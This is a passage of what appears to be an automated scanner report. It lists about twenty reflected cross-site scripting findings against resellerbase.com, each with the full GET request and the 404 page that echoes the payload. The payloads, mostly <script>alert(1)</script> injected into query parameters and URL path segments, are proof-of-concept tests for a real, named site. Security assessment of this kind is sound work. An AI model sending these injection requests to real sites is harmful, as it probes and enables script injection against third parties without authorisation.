Host:	http://www.resellerbase.com
Path:	/detail/15/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d1def<a>3546e283e4f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/search.php?keyword=search...&Submit3=Searchd1def<a>3546e283e4f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/search.php?keyword=search...&Submit3=Searchd1def<a>3546e283e4f&opt=2 was not found on this server.</p>
...[SNIP]...

2.1222. http://www.resellerbase.com/detail/15/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c3994<a>be00eccf1ba was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/search.php?keyword=search...c3994<a>be00eccf1ba&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/search.php?keyword=search...c3994<a>be00eccf1ba&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1223. http://www.resellerbase.com/detail/15/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c670a<script>alert(1)</script>3d899d24fbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/search.php?keyword=search...&Submit3=Search&opt=2&c670a<script>alert(1)</script>3d899d24fbd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/search.php?keyword=search...&Submit3=Search&opt=2&c670a<script>alert(1)</script>3d899d24fbd=1 was not found on this server.</p>
...[SNIP]...

2.1224. http://www.resellerbase.com/detail/15/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 2ed8a<a>062935842db was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/search.php?keyword=search...&Submit3=Search&opt=22ed8a<a>062935842db HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/search.php?keyword=search...&Submit3=Search&opt=22ed8a<a>062935842db was not found on this server.</p>
...[SNIP]...

2.1225. http://www.resellerbase.com/detail/15/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 290d1<script>alert(1)</script>812996e686f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail290d1<script>alert(1)</script>812996e686f/15/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail290d1<script>alert(1)</script>812996e686f/15/themes/ was not found on this server.</p>
...[SNIP]...

2.1226. http://www.resellerbase.com/detail/15/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5103<script>alert(1)</script>85654c26642 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15c5103<script>alert(1)</script>85654c26642/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15c5103<script>alert(1)</script>85654c26642/themes/ was not found on this server.</p>
...[SNIP]...

2.1227. http://www.resellerbase.com/detail/15/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3d881<script>alert(1)</script>a872731054 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes3d881<script>alert(1)</script>a872731054/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes3d881<script>alert(1)</script>a872731054/ was not found on this server.</p>
...[SNIP]...

2.1228. http://www.resellerbase.com/detail/15/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a5a01<script>alert(1)</script>1c46f6cd787 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/?a5a01<script>alert(1)</script>1c46f6cd787=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1229. http://www.resellerbase.com/detail/15/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1c9d7<script>alert(1)</script>6513d342088 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1c9d7<script>alert(1)</script>6513d342088/15/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1c9d7<script>alert(1)</script>6513d342088/15/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1230. http://www.resellerbase.com/detail/15/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a9bd<script>alert(1)</script>11d4fb0d771 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/151a9bd<script>alert(1)</script>11d4fb0d771/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/151a9bd<script>alert(1)</script>11d4fb0d771/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1231. http://www.resellerbase.com/detail/15/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e613a<script>alert(1)</script>7abed3b751 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themese613a<script>alert(1)</script>7abed3b751/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themese613a<script>alert(1)</script>7abed3b751/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1232. http://www.resellerbase.com/detail/15/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f2a92<script>alert(1)</script>12dd9329709 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmosf2a92<script>alert(1)</script>12dd9329709/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmosf2a92<script>alert(1)</script>12dd9329709/ was not found on this server.</p>
...[SNIP]...

2.1233. http://www.resellerbase.com/detail/15/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6c77e<script>alert(1)</script>fca2a8e513a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/?6c77e<script>alert(1)</script>fca2a8e513a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/?6c77e<script>alert(1)</script>fca2a8e513a=1 was not found on this server.</p>
...[SNIP]...

2.1234. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4859<script>alert(1)</script>eb40363a587 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb4859<script>alert(1)</script>eb40363a587/15/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb4859<script>alert(1)</script>eb40363a587/15/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1235. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 58e5c<script>alert(1)</script>c70de867b02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1558e5c<script>alert(1)</script>c70de867b02/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1558e5c<script>alert(1)</script>c70de867b02/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1236. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 784ce<script>alert(1)</script>f197c321586 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes784ce<script>alert(1)</script>f197c321586/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes784ce<script>alert(1)</script>f197c321586/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1237. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c246f<script>alert(1)</script>f673057193 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmosc246f<script>alert(1)</script>f673057193/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmosc246f<script>alert(1)</script>f673057193/images/ was not found on this server.</p>
...[SNIP]...

2.1238. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e0a46<script>alert(1)</script>43a15688fac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/imagese0a46<script>alert(1)</script>43a15688fac/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/imagese0a46<script>alert(1)</script>43a15688fac/ was not found on this server.</p>
...[SNIP]...

2.1239. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 87628<script>alert(1)</script>1e78b1b6c73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/?87628<script>alert(1)</script>1e78b1b6c73=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/?87628<script>alert(1)</script>1e78b1b6c73=1 was not found on this server.</p>
...[SNIP]...

2.1240. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5fa2d<script>alert(1)</script>48925d4c912 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5fa2d<script>alert(1)</script>48925d4c912/15/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5fa2d<script>alert(1)</script>48925d4c912/15/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1241. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b8f39<script>alert(1)</script>ddf40442aaf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15b8f39<script>alert(1)</script>ddf40442aaf/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
